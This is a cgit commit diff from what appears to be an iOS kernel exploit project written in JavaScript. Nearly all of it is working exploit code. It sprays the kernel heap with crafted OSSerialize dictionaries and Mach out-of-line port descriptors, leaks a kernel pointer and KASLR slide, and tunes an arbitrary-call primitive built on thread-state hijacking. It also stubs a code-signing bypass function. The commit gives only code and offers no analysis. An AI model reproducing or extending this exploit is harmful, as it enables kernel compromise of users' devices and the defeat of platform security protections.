summaryrefslogtreecommitdiff
path: root/src/js
diff options
context:
space:
mode:
Diffstat (limited to 'src/js')
-rw-r--r--src/js/kexp/exploit.js113
-rw-r--r--src/js/lib/myutils.js3
-rw-r--r--src/js/main.js6
-rw-r--r--src/js/primitives/call.js26
4 files changed, 134 insertions, 14 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 402dd9f..c28e59c 100644
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -19,6 +19,15 @@ var kport_ip_srights4 = 0x70;
var KERN_SUCCESS = 0;
var NULL = 0;
var MACH_PORT_NULL = 0;
+var req_init_port_set = 0x1c;
+var req_head_msgh_bits = 0x0;
+var req_head_msgh_request_port = 0x8;
+var req_head_msgh_reply_port = 0xc;
+var req_head_msgh_id = 0x14;
+var req_msgh_body_msgh_descriptor_count = 0x18;
+var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
+var req_init_port_set_address = 0x0
+var req_init_port_set_count = 0x4
var kslide = 0;
@@ -62,11 +71,7 @@ function spray_data(mem, size, num, portptr) {
write_u32(dict + (__cnt << 2), kOSSerializeEndCollection | kOSSerializeArray | num); __cnt++;
for (var i = 0; i < num; i++) {
- if (i == (num - 1)) {
- write_u32(dict + (__cnt << 2), kOSSerializeEndCollection | kOSSerializeData | SIZEOF_BYTES_MSG); __cnt++;
- } else {
- write_u32(dict + (__cnt << 2), kOSSerializeData | SIZEOF_BYTES_MSG); __cnt++;
- }
+ write_u32(dict + (__cnt << 2), ((i == num - 1) ? kOSSerializeEndCollection : 0) | kOSSerializeData | SIZEOF_BYTES_MSG); __cnt++;
if (mem != 0 && size != 0) {
memcpy(dict + (__cnt << 2), mem, size);
}
@@ -136,10 +141,86 @@ function copyinPort(kport, cnt) {
printf("still alive? %x\n", 420);
printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
found = true;
- return (read_u32(buf + (4 << 2)) - 0x78);
+ return ((read_u32(buf + (4 << 2)) - 0x78)) >>> 0;
}
}
+}
+
+function prepare_ptr(dict, size, ptr, num) {
+ var idx = 0;
+ write_u32(dict + (idx << 2), kOSSerializeMagic); idx++;
+ write_u32(dict + (idx << 2), kOSSerializeEndCollection | kOSSerializeDictionary | 1); idx++;
+ write_u32(dict + (idx << 2), kOSSerializeSymbol | 4); idx++;
+ write_u32(dict + (idx << 2), 0x0079656b); idx++;
+ write_u32(dict + (idx << 2), (kOSSerializeEndCollection | kOSSerializeArray | (num >>> 0))); idx++;
+ for (var i = 0; i < num; i++) {
+ write_u32(dict + (idx << 2), ((i == (num - 1)) ? kOSSerializeEndCollection : 0) | kOSSerializeData | 8); idx++;
+ write_u32(dict + (idx << 2), ptr); idx++;
+ write_u32(dict + (idx << 2), ptr); idx++;
+ }
+
+ write_u32(size, idx * 4);
+ return KERN_SUCCESS;
+}
+
+function spray(dict, size, port) {
+ var err = malloc(4);
+ var ret = 0;
+ var master = malloc(4);
+
+ host_get_io_master(mach_host_self(), master);
+ io_service_add_notification_ool(master, "IOServiceTerminate", dict, size, MACH_PORT_NULL, NULL, 0, err, port);
+
+ if (ret == KERN_SUCCESS) {
+ ret = read_u32(err);
+ }
+ return ret;
+}
+
+var kp = 0;
+function spray_ports(number_port_descs) {
+ printf("spray_ports\n");
+ if (kp == 0) {
+ kp = malloc(4);
+ mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, kp);
+ mach_port_insert_right(mach_task_self(), read_u32(kp), read_u32(kp), MACH_MSG_TYPE_MAKE_SEND);
+ }
+
+ var mp = malloc(4);
+
+ mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, mp);
+ printf("%x\n", read_u32(mp));
+ mach_port_insert_right(mach_task_self(), read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
+
+ send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ return mp;
+}
+
+function send_ports(target, payload, num, number_port_descs) {
+ var init_port_set = malloc(num * 4);
+
+ for (var i = 0; i < num; i++) {
+ write_u32(init_port_set + (i << 2), payload);
+ }
+
+ var buf = malloc(0x1c + (number_port_descs * 0xc));
+ write_u32(buf + req_msgh_body_msgh_descriptor_count, number_port_descs);
+
+ for (var i = 0; i < number_port_descs; i++) {
+ write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_address, init_port_set);
+ write_u32(buf + (req_init_port_set * (i + 1)) + req_init_port_set_count, num);
+ write_u8(buf + (req_init_port_set * (i + 1)) + 0x8, 0);
+ write_u8(buf + (req_init_port_set * (i + 1)) + 0xa, 19);
+ write_u8(buf + (req_init_port_set * (i + 1)) + 0xb, MACH_MSG_OOL_PORTS_DESCRIPTOR);
+ }
+
+ write_u32(buf + req_head_msgh_bits, 0x80001513); // MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE)
+ write_u32(buf + req_head_msgh_request_port, target);
+ write_u32(buf + req_head_msgh_reply_port, 0);
+ write_u32(buf + req_head_msgh_id, 1337);
+
+ return mach_msg(read_u32(buf + 0x0), read_u32(buf + 0x4), read_u32(buf + 0x8), read_u32(buf + 0xc), read_u32(buf + 0x10), read_u32(buf + 0x14), 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
}
function get_kernel_task() {
@@ -169,8 +250,8 @@ function get_kernel_task() {
var big_buf = malloc(MIG_MAX);
var small_buf = malloc(MIG_MAX);
- var big_size = 0;
- var small_size = 0;
+ var big_size = malloc(4);
+ var small_size = malloc(4);
var fp = malloc(PORTS_NUM * 4);
var postSpray = malloc(4);
@@ -180,6 +261,22 @@ function get_kernel_task() {
var kptr = copyinPort(kport, 2);
printf("0x%08x\n", kptr);
+ write_u32(data, kptr);
+ write_u32(data + 4, kptr);
+
+ prepare_ptr(big_buf, big_size, kptr, 256);
+ prepare_ptr(small_buf, small_size, kptr, 32);
+
+ for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
+ var dummy = malloc(4);
+ spray(big_buf, big_size, dummy);
+ }
+
+ for (var i = 0; i < PORTS_NUM; i++) {
+ write_u32(fp + (i << 2), spray_ports(i));
+ var dummy = malloc(4);
+ spray(small_buf, small_size, dummy);
+ }
printf("get lucky\n");
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index f3eb976..51fc055 100644
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -111,4 +111,5 @@ var IOServiceMatching = scall_wrapper("IOServiceMatching");
var io_service_open_extended = scall_wrapper("io_service_open_extended");
var IORegistryEntryGetChildIterator = scall_wrapper("IORegistryEntryGetChildIterator");
var IOIteratorNext = scall_wrapper("IOIteratorNext");
-var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty"); \ No newline at end of file
+var IORegistryEntryGetProperty = scall_wrapper("IORegistryEntryGetProperty");
+var mach_msg = scall_wrapper("mach_msg"); \ No newline at end of file
diff --git a/src/js/main.js b/src/js/main.js
index b3b0e4c..4d978ef 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -22,6 +22,10 @@ try {
puts = function (){};
}
+function csbypass() {
+
+}
+
function main() {
/*
* get slide and calculate slid base
@@ -41,6 +45,8 @@ function main() {
puts("we out here");
puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
+// csbypass();
+
printf("slide=0x%x\n", slide);
printf("*(uint8_t*)base = 0x%x\n", read_u8(base));
printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 9bb43c1..97a47b6 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -167,6 +167,11 @@ function callnarg() {
}
/*
+ * r9
+ */
+ write_u32(thread_state + (11 << 2), 0x1337);
+
+ /*
* stack
*/
write_u32(thread_state + (13 << 2), stack_shit);
@@ -199,7 +204,6 @@ function callnarg() {
* probably un-necessary now, keeping in just in case for now
*/
calls4arg("thread_resume", read_u32(th), 0, 0, 0);
- calls4arg("usleep", 1000, 0, 0, 0);
/*
* spin wait for return
@@ -208,19 +212,19 @@ function callnarg() {
/*
* reset, it's used as input for thread_state size
*/
- write_u32(count, 0x1000);
+ write_u32(count, 0x100);
calls4arg("thread_get_state", read_u32(th), ARM_THREAD_STATE, thread_state, count);
/*
* if the pc is in (resolver, resolver + 8), suspend the thread
* (to not spin endlessly), read r0 and return
*/
- if ((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) {
+ if (((read_u32(thread_state + (15 << 2)) - (__stack_chk_fail_resolver + dyld_shc_slide)) <= 8) && (read_u32(thread_state + (11 << 2)) == 0x1337)) {
calls4arg("thread_suspend", read_u32(th), 0, 0, 0);
return read_u32(thread_state);
}
- calls4arg("usleep", 1000, 0, 0, 0);
+// calls4arg("usleep", 1000, 0, 0, 0);
}
}
@@ -249,6 +253,7 @@ function scall() {
}
var args_to_pass = new Array();
+ var force_callnarg = false;
args_to_pass.push(addy);
@@ -257,10 +262,21 @@ function scall() {
args_to_pass.push(sptr(arguments[i]));
} else {
args_to_pass.push(arguments[i]);
+ if ((arguments[i] & 0xffff0000 == 0xffff0000 || arguments[i] & 0xffff0000 == 0xfffe0000)) {
+ force_callnarg = true;
+ }
}
}
// printf("%s\n", args_to_pass.toString());
- return callnarg.apply(this, args_to_pass);
+ if (args_to_pass.length > 5 || force_callnarg) {
+ return callnarg.apply(this, args_to_pass);
+ } else {
+ var count_to_me = 5 - arguments.length;
+ for (var i = 0; i < count_to_me; i++) {
+ args_to_pass.push(0);
+ }
+ return call4arg.apply(this, args_to_pass)
+ }
} \ No newline at end of file
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 22:20:32 +0000